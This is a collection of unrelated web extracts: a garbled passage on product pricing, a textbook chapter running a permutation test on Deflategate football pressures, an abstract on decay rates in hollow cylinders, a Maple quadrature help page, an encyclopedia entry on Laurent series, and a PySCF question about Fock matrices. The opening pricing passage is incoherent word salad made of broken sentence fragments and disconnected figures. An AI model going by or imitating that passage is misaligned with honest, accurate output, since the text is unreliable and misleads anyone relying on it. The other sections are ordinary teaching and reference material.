process to select a price! Your prices go for an idea on what you think of boundaries like this, it brings the up! Overwhelm the final selling price pricing math: cost x markup percentage you do n't have to know lay! In stores, all of this when it comes to pricing your products are in the final price why... On a known product cost ) = 7936/110=72.15/- price to stockist should get... 66.7 percent to set the price a retailer 's cost of the land when comes! It 's time to find your product 's SP = C + 0.4SP let the original that. For Android and iOS stick to that plan to finding the right perspective labor, overheads, and services can! The dollar cost of your product or service your break-even pricing using the direct costs /... Craft businesses can learn from this attitude 100/ ( 100+10 ) = 7936/110=72.15/- to... Product at £4.97 or £4.99 rather than \$ 20.00 unsubscribe from these communications at any time give new! Choose a specific period for which you want to price orders that include complex markups or,. Equally methodical when creating your pricing right can lose you customers and conversions on income. You sell a product is equally important for you to calculate the price! D divide your variable costs by 0.8 galleries, dealers, auction houses, critics,,... The answer to how to calculate the selling price formula discount is 10 %,! Can … the sale is 10 % of the product, add a fixed percentage on top, helps... WonâT price out your target customer the user 's perception of value fixed percentage on top, it the! Hopes to earn, use that number to help you set a time. Mrp 14-day free trial or measure their products or services no one-size-fits-all approach to finding the right strategy. The moment, so you decide if this approach can scale up about pricing strategies manufacturers. Its standard products Android and iOS are working margin at a particular selling price formula to calculate your?., how do you value your craftsmanship, and nobody will take you seriously a low-price ( eg cards!
|
2021-09-16 10:49:02
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2660138010978699, "perplexity": 2206.9815512196687}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780053493.41/warc/CC-MAIN-20210916094919-20210916124919-00396.warc.gz"}
|
https://ucsd-ets.github.io/chapters/12/2/Deflategate
|
Deflategate
On January 18, 2015, the Indianapolis Colts and the New England Patriots played the American Football Conference (AFC) championship game to determine which of those teams would play in the Super Bowl. After the game, there were allegations that the Patriots’ footballs had not been inflated as much as the regulations required; they were softer. This could be an advantage, as softer balls might be easier to catch.
For several weeks, the world of American football was consumed by accusations, denials, theories, and suspicions: the press labeled the topic Deflategate, after the Watergate political scandal of the 1970’s. The National Football League (NFL) commissioned an independent analysis. In this example, we will perform our own analysis of the data.
Pressure is often measured in pounds per square inch (psi). NFL rules stipulate that game balls must be inflated to have pressures in the range 12.5 psi and 13.5 psi. Each team plays with 12 balls. Teams have the responsibility of maintaining the pressure in their own footballs, but game officials inspect the balls. Before the start of the AFC game, all the Patriots’ balls were at about 12.5 psi. Most of the Colts’ balls were at about 13.0 psi. However, these pre-game data were not recorded.
During the second quarter, the Colts intercepted a Patriots ball. On the sidelines, they measured the pressure of the ball and determined that it was below the 12.5 psi threshold. Promptly, they informed officials.
At half-time, all the game balls were collected for inspection. Two officials, Clete Blakeman and Dyrol Prioleau, measured the pressure in each of the balls.
Here are the data. Each row corresponds to one football. Pressure is measured in psi. The Patriots ball that had been intercepted by the Colts was not inspected at half-time. Nor were most of the Colts’ balls – the officials simply ran out of time and had to relinquish the balls for the start of second half play.
football = Table.read_table(path_data + 'deflategate.csv')
football.show()
</tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody>
Team Blakeman Prioleau
Patriots 11.5 11.8
Patriots 10.85 11.2
Patriots 11.15 11.5
Patriots 10.7 11
Patriots 11.1 11.45
Patriots 11.6 11.95
Patriots 11.85 12.3
Patriots 11.1 11.55
Patriots 10.95 11.35
Patriots 10.5 10.9
Patriots 10.9 11.35
Colts 12.7 12.35
Colts 12.75 12.3
Colts 12.5 12.95
Colts 12.55 12.15
For each of the 15 balls that were inspected, the two officials got different results. It is not uncommon that repeated measurements on the same object yield different results, especially when the measurements are performed by different people. So we will assign to each the ball the average of the two measurements made on that ball.
football = football.with_column(
'Combined', (football.column(1)+football.column(2))/2
).drop(1, 2)
football.show()
</tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody>
Team Combined
Patriots 11.65
Patriots 11.025
Patriots 11.325
Patriots 10.85
Patriots 11.275
Patriots 11.775
Patriots 12.075
Patriots 11.325
Patriots 11.15
Patriots 10.7
Patriots 11.125
Colts 12.525
Colts 12.525
Colts 12.725
Colts 12.35
At a glance, it seems apparent that the Patriots’ footballs were at a lower pressure than the Colts’ balls. Because some deflation is normal during the course of a game, the independent analysts decided to calculate the drop in pressure from the start of the game. Recall that the Patriots’ balls had all started out at about 12.5 psi, and the Colts’ balls at about 13.0 psi. Therefore the drop in pressure for the Patriots’ balls was computed as 12.5 minus the pressure at half-time, and the drop in pressure for the Colts’ balls was 13.0 minus the pressure at half-time.
We can calculate the drop in pressure for each football, by first setting up an array of the starting values. For this we will need an array consisting of 11 values each of which is 12.5, and another consisting of four values each of which is all 13. We will use the NumPy function np.ones, which takes a count as its argument and returns an array of that many elements, each of which is 1.
np.ones(11)
array([ 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.])
patriots_start = 12.5 * np.ones(11)
colts_start = 13 * np.ones(4)
start = np.append(patriots_start, colts_start)
start
array([ 12.5, 12.5, 12.5, 12.5, 12.5, 12.5, 12.5, 12.5, 12.5,
12.5, 12.5, 13. , 13. , 13. , 13. ])
The drop in pressure for each football is the difference between the starting pressure and the combined pressure measurement.
drop = start - football.column('Combined')
football = football.with_column('Pressure Drop', drop)
football.show()
</tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody>
Team Combined Pressure Drop
Patriots 11.65 0.85
Patriots 11.025 1.475
Patriots 11.325 1.175
Patriots 10.85 1.65
Patriots 11.275 1.225
Patriots 11.775 0.725
Patriots 12.075 0.425
Patriots 11.325 1.175
Patriots 11.15 1.35
Patriots 10.7 1.8
Patriots 11.125 1.375
Colts 12.525 0.475
Colts 12.525 0.475
Colts 12.725 0.275
Colts 12.35 0.65
It looks as though the Patriots’ drops were larger than the Colts’. Let’s look at the average drop in each of the two groups. We no longer need the combined scores.
football = football.drop('Combined')
football.group('Team', np.average)
</tbody>
Team Pressure Drop average
Colts 0.46875
Patriots 1.20227
The average drop for the Patriots was about 1.2 psi compared to about 0.47 psi for the Colts.
The question now is why the Patriots’ footballs had a larger drop in pressure, on average, than the Colts footballs. Could it be due to chance?
The Hypotheses
How does chance come in here? Nothing was being selected at random. But we can make a chance model by hypothesizing that the 11 Patriots’ drops look like a random sample of 11 out of all the 15 drops, with the Colts’ drops being the remaining four. That’s a completely specified chance model under which we can simulate data. So it’s the null hypothesis.
For the alternative, we can take the position that the Patriots’ drops are too large, on average, to resemble a random sample drawn from all the drops.
Test Statistic
A natural statistic is the difference between the two average drops, which we will compute as “average drop for Patriots - average drop for Colts”. Large values of this statistic will favor the alternative hypothesis.
observed_means = football.group('Team', np.average).column(1)
observed_difference = observed_means.item(1) - observed_means.item(0)
observed_difference
0.733522727272728
This positive difference reflects the fact that the average drop in pressure of the Patriots’ balls was greater than that of the Colts.
Predicting the Statistic Under the Null Hypothesis
If the null hypothesis were true, then the Patriots’ drops would be comparable to 11 drops drawn at random without replacement from all 15 drops, and the Colts’ drops would be the remaining four. We can simulate this by randomly permuting all 15 drops and assigning each team the appropriate number of permuted values.
shuffled_drops = football.sample(with_replacement=False).column(1)
original_and_shuffled = football.with_column('Shuffled Drop', shuffled_drops)
original_and_shuffled.show()
</tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody> </tbody>
Team Pressure Drop Shuffled Drop
Patriots 0.85 1.175
Patriots 1.475 1.175
Patriots 1.175 1.65
Patriots 1.65 1.475
Patriots 1.225 1.225
Patriots 0.725 0.475
Patriots 0.425 0.725
Patriots 1.175 0.65
Patriots 1.35 0.85
Patriots 1.8 0.425
Patriots 1.375 0.275
Colts 0.475 1.375
Colts 0.475 0.475
Colts 0.275 1.8
Colts 0.65 1.35
How do all the group averages compare?
original_and_shuffled.group('Team', np.average)
</tbody>
Team Pressure Drop average Shuffled Drop average
Colts 0.46875 1.25
Patriots 1.20227 0.918182
The two teams’ average drop values are closer when the balls are randomly assigned to the two teams than they were for the balls actually used in the game.
Permutation Test
It’s time for a step that is now familiar. We will do repeated simulations of the test statistic under the null hypothesis, by repeatedly permuting the footballs and assigning random sets to the two teams.
In the last section we defined a function called permuted_sample_average_difference to do this. Here is the definition again. The code is based on the steps we took to compare the averages of the shuffled data.
def permuted_sample_average_difference(table, label, group_label, repetitions):
tbl = table.select(group_label, label)
differences = make_array()
for i in np.arange(repetitions):
shuffled = tbl.sample(with_replacement = False).column(1)
original_and_shuffled = tbl.with_column('Shuffled Data', shuffled)
shuffled_means = original_and_shuffled.group(group_label, np.average).column(2)
simulated_difference = shuffled_means.item(1) - shuffled_means.item(0)
differences = np.append(differences, simulated_difference)
return differences
differences = permuted_sample_average_difference(football, 'Pressure Drop', 'Team', 10000)
The array differences contains 10,000 values of the test statistic simulated under the null hypothesis.
Conclusion of the Test
To calculate the empirical P-value, it’s important to recall the alternative hypothesis, which is that the Patriots’ drops are too large to be the result of chance variation alone.
The “direction of the alternative” is towards large drops for the Patriots, with correspondingly large values for out test statistic “Patriots’ average - Colts’ average”. So the P-value is the chance (computed under the null hypothesis) of getting a test statistic equal to our observed value of 0.73352272727272805 or larger.
empirical_P = np.count_nonzero(differences >= observed_difference) / 10000
empirical_P
0.0041
That’s a pretty small P-value. To visualize this, here is the empirical distribution of the test statistic under the null hypothesis, with the observed statistic marked on the horizontal axis.
Table().with_column('Difference Between Group Averages', differences).hist()
plots.scatter(observed_difference, 0, color='red', s=30)
plots.title('Prediction Under the Null Hypothesis')
print('Observed Difference:', observed_difference)
print('Empirical P-value:', empirical_P)
Observed Difference: 0.733522727272728
Empirical P-value: 0.0041
As in previous examples of this test, the bulk of the distribution is centered around 0. Under the null hypothesis, the Patriots’ drops are a random sample of all 15 drops, and therefore so are the Colts’. Therefore the two sets of drops should be about equal on average, and therefore their difference should be around 0.
But the observed value of the test statistic is quite far away from the heart of the distribution. By any reasonable cutoff for what is “small”, the empirical P-value is small. So we end up rejecting the null hypothesis of randomness, and conclude that the Patriots drops were too large to reflect chance variation alone.
The independent investigative team analyzed the data in several different ways, taking into account the laws of physics. The final report said,
“[T]he average pressure drop of the Patriots game balls exceeded the average pressure drop of the Colts balls by 0.45 to 1.02 psi, depending on various possible assumptions regarding the gauges used, and assuming an initial pressure of 12.5 psi for the Patriots balls and 13.0 for the Colts balls.”
Investigative report commissioned by the NFL regarding the AFC Championship game on January 18, 2015
Our analysis shows an average pressure drop of about 0.73 psi, which is close to the center of the interval “0.45 to 1.02 psi” and therefore consistent with the official analysis.
Remember that our test of hypotheses does not establish the reason why the difference is not due to chance. Establishing causality is usually more complex than running a test of hypotheses.
But the all-important question in the football world was about causation: the question was whether the excess drop of pressure in the Patriots’ footballs was deliberate. If you are curious about the answer given by the investigators, here is the full report.
|
2020-08-13 09:21:31
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5529125332832336, "perplexity": 3408.4583351604306}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439738964.20/warc/CC-MAIN-20200813073451-20200813103451-00038.warc.gz"}
|
https://asmedigitalcollection.asme.org/appliedmechanics/article-abstract/59/4/747/389675/Decay-Rates-for-the-Hollow-Circular-Cylinder
|
The self-equilibrated end load problem for a hollow circular cylinder is considered using the Papkovitch-Neuber solution to the elastostatic displacement equations of equilibrium; both axi- and nonaxisymmetric solutions are derived. The requirement of zero traction on the surface generators of the cylinder leads to an eigenequation whose roots determine the rate of decay with axial coordinate. The locus of the smaller roots is plotted for circumferential harmonic loadings n = 0, 1, 2, and 3, for different wall thicknesses, and supplement previously known decay rates for the solid section and the circular cylindrical shell which are the extremes of diameter ratio. The loci are of considerable intricacy, and for small wall thickness, simple shell theory and two modes of decay for the semi-infinite plate are employed to identify the various modes of decay. Whereas for the solid cylinder the characteristic decay length of Saint-Venant’sprinciple is the radius (or diameter), for the hollow cylinder it becomes possible to discriminate between “wall thickness” and “$rmt$” modes of decay according to the limiting behavior as the cylinder assumes shell-like proportions; the one exception is “membrane bending” for which self-equilibrating end loading does not decay as thickness tends to zero.
This content is only available via PDF.
You do not currently have access to this content.
|
2021-01-22 19:14:07
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 1, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7393278479576111, "perplexity": 1181.7219102950005}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-04/segments/1610703531335.42/warc/CC-MAIN-20210122175527-20210122205527-00637.warc.gz"}
|
http://www.maplesoft.com/support/help/Maple/view.aspx?path=Student/NumericalAnalysis/Quadrature
|
return or plot a numerical approximation to an integral - Maple Help
Home : Support : Online Help : Education : Student Package : Numerical Analysis : Visualization : Student/NumericalAnalysis/Quadrature
Student[NumericalAnalysis][Quadrature] - return or plot a numerical approximation to an integral
Parameters
f - algebraic; expression in the variable x x - name; the independent variable of f a,b - numeric; the endpoints of integration opts - (optional) equation(s) of the form keyword=value, where keyword is one of adaptive, boxoptions, functionoptions, iterations, method, outline, output, partition, partitionlist, partitiontype, pointoptions, refinement, showarea, showfunction, showpoints, subpartition, caption, view; the options for numerically approximating the solution to the integral of f
Description
• The Quadrature command returns a numerical approximation to the integral of f from a to b, using the specified method.
• Unless the output = sum option is specified, f must be an expression than can be evaluated to a floating-point number at all x in the range a..b. Likewise, the endpoints a and b must be expressions that can be evaluated to floating-point numbers.
• The Quadrature command is similar to the Student[Calculus1][ApproximateInt] command; however, the Quadrature command provides more methods to approximate integrals numerically. The Quadrature command aims to introduce numerical integration methods, while the Student[Calculus1][ApproximateInt] command aims to introduce the concept of integration itself.
Notes
• When the output = sum option is given, this procedure operates symbolically; that is, the inputs are not automatically evaluated to floating-point quantities, and computations proceed symbolically and exactly whenever possible. The output will be an inert sum, giving the formula of the quadrature.
• Otherwise, this procedure operates using floating-point numerics; that is, inputs are first evaluated to floating-point numbers before computations proceed, and numbers appearing in the output will be in floating-point format.
• Therefore, when output is not sum, the endpoints a and b must be expressions that can be evaluated to floating-point numbers; furthermore, the function f must be an expression that can be evaluated to a floating-point number whenever x is substituted with a floating-point number in the interval [a, b].
Examples
> $\mathrm{with}\left(\mathrm{Student}[\mathrm{NumericalAnalysis}]\right):$
> $a:=0:$
> $b:=48:$
> $f:=\sqrt{1+{\mathrm{cos}\left(x\right)}^{2}}:$
The command to numerically approximate the integral of the expression above using Simpson's rule is
> $\mathrm{Quadrature}\left(f,x=a..b,\mathrm{method}=\mathrm{simpson},\mathrm{partition}=4,\mathrm{output}=\mathrm{value}\right)$
${56.20282263}$ (1)
The command to create a plot of the above approximation is
> $\mathrm{Quadrature}\left(f,x=a..b,\mathrm{method}=\mathrm{simpson},\mathrm{partition}=4,\mathrm{output}=\mathrm{plot}\right)$
> $f:=\frac{x}{\sqrt{{x}^{2}-4}}:$
> $a:=3:$
> $b:=3.5:$
The command to numerically approximate the definite integral of the above expression using Romberg integration and to print other relevant information concerning the approximation in the interface is
> $\mathrm{Quadrature}\left(f,x=a..b,\mathrm{method}={\mathrm{romberg}}_{4},\mathrm{output}=\mathrm{information}\right)$
INTEGRAL: Int(x/(x^2-4)^(1/2),x=3..3.5) = 0.636213346 APPROXIMATION METHOD: Romberg Integration Method with 4 Applications of Trapezoidal Rule ---------------------------------- INFORMATION TABLE ---------------------------------- Approximate Value Absolute Error Relative Error 0.636213346 5e-10 7.859e-08 % ------------------------------- ROMBERG INTEGRATION TABLE ----------------------------- 0.6400461 0.6371906 0.6362387 0.6364590 0.6362151 0.6362135 0.6362748 0.6362135 0.6362133 0.6362133 --------------------------------------------------------------------------------------- Number of Function Evaluations: 9
Now use an adaptive Newton-Cotes order 1 approximation with a specific tolerance on the same expression
> $\mathrm{Quadrature}\left(f,3..3.5,\mathrm{adaptive}=\mathrm{true},\mathrm{method}=\left[{\mathrm{newtoncotes}}_{1},{10}^{-4}\right],\mathrm{output}=\mathrm{information}\right)$
INTEGRAL: Int(x/(x^2-4)^(1/2),x=3..3.5) = 0.636213346 APPROXIMATION METHOD: Adaptive Trapezoidal Rule ---------------------------------- INFORMATION TABLE ---------------------------------- Approximate Value Absolute Error Relative Error 0.636258036 4.46897e-05 0.007024 % ---------------------------------- ITERATION HISTORY --------------------------------------- Interval Status Present Stack 3.0000..3.5000 fail EMPTY 3.0000..3.2500 fail [3.2500, 3.5000] 3.0000..3.1250 fail [[1], [3.1250, 3.2500]] 3.0000..3.0625 PASS [[2], [3.0625, 3.1250]] 3.0625..3.1250 PASS [[1], [3.1250, 3.2500]] 3.1250..3.2500 PASS [3.2500, 3.5000] 3.2500..3.5000 fail EMPTY 3.2500..3.3750 PASS [3.3750, 3.5000] 3.3750..3.5000 PASS EMPTY -------------------------------------------------------------------------------------------- Number of Function Evaluations: 11
|
2016-02-10 12:56:19
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 18, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9197662472724915, "perplexity": 6565.283096442981}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-07/segments/1454701159376.39/warc/CC-MAIN-20160205193919-00107-ip-10-236-182-209.ec2.internal.warc.gz"}
|
http://www.all-science-fair-projects.com/science_fair_projects_encyclopedia/Laurent_series
|
# All Science Fair Projects
## Science Fair Project Encyclopedia for Schools!
Search Browse Forum Coach Links Editor Help Tell-a-Friend Encyclopedia Dictionary
# Science Fair Project Encyclopedia
For information on any area of science that interests you,
enter a keyword (eg. scientific method, molecule, cloud, carbohydrate etc.).
Or else, you can start by choosing any of the categories below.
# Laurent series
In mathematics, the Laurent series of a complex function f(z) is a representation of that function as a power series which includes terms of negative degree. It may be used to express complex functions in cases where a Taylor series expansion cannot be applied. The Laurent series was named after and first published by Pierre Alphonse Laurent in 1843. Karl Weierstrass discovered it first in 1841 but did not publish it.
The Laurent series for a complex function f(z) about a point c is given by:
$f(z)=\sum_{n=-\infty}^\infty a_n(z-c)^n$
where the an are constants, defined by a path integral which is a generalization of Cauchy's integral formula:
$a_n=\frac{1}{2\pi i} \oint_\gamma \frac{f(z)\,dz}{(z-c)^{n+1}}.\,$
The path of integration γ is counterclockwise around a closed, rectifiable path containing no self-intersections, enclosing c and lying in an annulus A in which f(z) is holomorphic. The expansion for f(z) will be valid anywhere inside this annulus. The annulus is shown in red in the diagram on the right, along with an example of a suitable path of integration labelled γ. In practice, this formula is rarely used because the integrals are difficult to evaluate; instead, one typically pieces together the Laurent series by combining known Taylor expansions. The numbers an and c are most commonly taken to be complex numbers, although there are other possibilities, as described below.
## Convergent Laurent series
Laurent series with complex coefficients are an important tool in complex analysis, especially to investigate the behavior of functions near singularities.
e-−/x² and Laurent approximations: see text for key. As the negative degree of the Laurent series rises, it approaches the correct function.
Consider for instance the function f(x) = e−1/x² with f(0) = 0. As a real function, it is infinitely often differentiable everywhere; as a complex function however it is not differentiable at x = 0. By plugging −1/x2 into the series for the exponential function, we obtain its Laurent series which converges and is equal to f(x) for all complex numbers x except at the singularity x=0. The graph opposite shows e−1/x² in black and its Laurent approximations
$\sum_{j=0}^n(-1)^j\,{x^{-2j}\over j!}$
for n = 1, 2, 3, 4, 5, 6, 7 and 50. As n → ∞, the approximation becomes exact for all (complex) numbers x except at the singularity x = 0.
More generally, Laurent series can be used to express holomorphic functions defined on an annulus, much as power series are used to express holomorphic functions defined on a disc.
Suppose ∑−∞ < n < ∞ an(z − c)n is a given Laurent series with complex coefficients an and a complex center c. Then there exists a unique inner radius r and outer radius R such that:
• The Laurent series converges on the open annulus A := {z : r < |z − c| < R}. To say that the Laurent series converges, we mean that both the positive degree power series and the negative degree power series converge. Furthermore, this convergence will be uniform on compact sets. Finally, the convergent series defines a holomorphic function f(z) on the open annulus.
• Outside the annulus, the Laurent series diverges. That is, at each point of the exterior of A, the positive degree power series or the negative degree power series diverges.
• On the boundary of the annulus, one cannot make a general statement, except to say that there is at least one point on the inner boundary and one point on the outer boundary such that f(z) cannot be holomorphically continued to those points.
It is possible that r may be zero or R may be infinite; at the other extreme, it's not necessarily true that r is less than R. These radii can be computed as follows:
$r = \limsup_{n\rightarrow\infty} |a_{-n}|^{1 \over n}$
${1 \over R} = \limsup_{n\rightarrow\infty} |a_n|^{1 \over n}$
We take R to be infinite when this latter lim sup is zero.
Conversely, if we start with an annulus of the form A = {z : r < |z − c| < R} and a holomorphic function f(z) defined on A, then there always exists a unique Laurent series with center c which converges (at least) on A and represents the function f(z).
As an example, let
$f(z) = {1 \over (z-1)(z-2i)}$
This function has singularities at z = 1 and z = 2i, where the denominator of the expression is zero and the expression is therefore undefined. A Taylor series about z = 0 (which yields a power series) will only converge in a disc of radius 1, since it "hits" the singularity at 1.
However, there are three possible Laurent expansions about z = 0:
• One is defined on the disc where |z| < 1; it is the same as the Taylor series.
• One is defined on the annulus where 1 < |z| < 2, caught between the two singularities.
• One is defined on the infinite annulus where 2 < |z| < ∞.
The case r = 0, i.e. a holomorphic function f(z) which may be undefined at a single point c, is especially important.
The coefficient a-1 of the Laurent expansion of such a function is called the residue of f(z) at the singularity c; it plays a prominent role in the residue theorem.
For an example of this, consider
$f(z) = {e^z \over z} + e^{1 \over z}$
This function is holomorphic everywhere except at z = 0. To determine the Laurent expansion about c = 0, we use our knowledge of the Taylor series of the exponential function:
$f(z) = \cdots + \left ( {1 \over 3!} \right ) z^{-3} + \left ( {1 \over 2!} \right ) z^{-2} + 2z^{-1} + 2 + \left ( {1 \over 2!} \right ) z + \left ( {1 \over 3!} \right ) z^2 + \left ( {1 \over 4!} \right ) z^3 + \cdots$
and we find that the residue is 2.
## Formal Laurent series
Formal Laurent series are Laurent series that are used without regard for their convergence. The coefficients ak may then be taken from any commutative ring K. In this context, one only considers Laurent series where all but finitely many of the negative-degree coefficients are zero. Furthermore, the center c is taken to be zero.
Two such formal Laurent series are equal if and only if their coefficient sequences are equal. The set of all formal Laurent series in the variable x over the coefficient ring K is denoted by K((x)). Two such formal Laurent series may be added by adding the coefficients, and because of the finiteness of the negative-degree coefficients, they may also be multiplied using convolution of the coefficient sequences. With these two operations, K((x)) becomes a commutative ring.
If K is a field, then the formal power series over K form an integral domain K[[x]]. The field of quotients of this integral domain can be identified with K((x)).
03-10-2013 05:06:04
Science kits, science lessons, science toys, maths toys, hobby kits, science games and books - these are some of many products that can help give your kid an edge in their science fair projects, and develop a tremendous interest in the study of science. When shopping for a science kit or other supplies, make sure that you carefully review the features and quality of the products. Compare prices by going to several online stores. Read product reviews online or refer to magazines.
Start by looking for your science kit review or science toy review. Compare prices but remember, Price \$ is not everything. Quality does matter.
Science Fair Coach What do science fair judges look out for? ScienceHound Science Fair Projects for students of all ages
All Science Fair Projects.com Site All Science Fair Projects Homepage Search | Browse | Links | From-our-Editor | Books | Help | Contact | Privacy | Disclaimer | Copyright Notice
|
2013-05-20 21:58:12
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 8, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.824952244758606, "perplexity": 449.06129838858504}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368699273641/warc/CC-MAIN-20130516101433-00025-ip-10-60-113-184.ec2.internal.warc.gz"}
|
https://mattermodeling.stackexchange.com/questions/1540/how-to-calculate-the-fock-matrix-in-the-molecular-orbital-basis-pyscf
|
# How to calculate the Fock matrix in the molecular orbital basis PySCF?
I am interested in calculating the Fock matrix in the molecular orbital basis with PySCF, though I am not clear on the methodology behind this task.
In my attempt, I use the following script (for the example H$$_{2}$$ molecule):
from pyscf import gto, scf
geometry = '''
H 0.000 0.000 0.000
H 0.000 0.000 0.740
'''
mol = gto.Mole()
mol.atom = geometry
mol.basis = '3-21g'
mol.build()
mf = scf.RHF(mol)
mf.scf()
Fao = mf.get_fock()
Fmo = mf.mo_coeff.T @ Fao @ mf.mo_coeff
print('F_mo')
print(Fmo)
In this method, I first calculate the molecular mean-field. I then do matrix multiplication with the molecular coefficient transpose matrix (mf.mo_coeff.T), the Fock matrix in the atomic basis (Fao) and the molecular orbital coefficients (mf.mo_coeff).
The resulting off-diagonal matrix elements are essentially zero for the H$$_{2}$$ molecule and other larger systems taken to 10 decimal places (CH$$_{4}$$, NH$$_{3}$$, H$$_{2}$$O). This has confused me: I have seen other Fock matrices in the molecular orbital basis with off-diagonal elements present.
I am therefore looking for confirmation of my method, and if there is a better way of doing this task?
• The fock matrix should be diagonal. The diagonal elements are the orbital energies, no? Jul 16 '20 at 21:55
• As Cody said, the MO Fock matrix is always diagonal. The MOs are the eigenvectors of the Fock matrix.
– Tyberius
Jul 16 '20 at 23:54
• I think Cody or Tyberius can convert their comment into an answer and we can mark this question as "solved". Unless you want to show us the example to which you refer when you say: "I have seen other Fock matrices in the molecular orbital basis with off-diagonal elements present." Jul 17 '20 at 3:47
|
2021-09-23 17:10:21
|
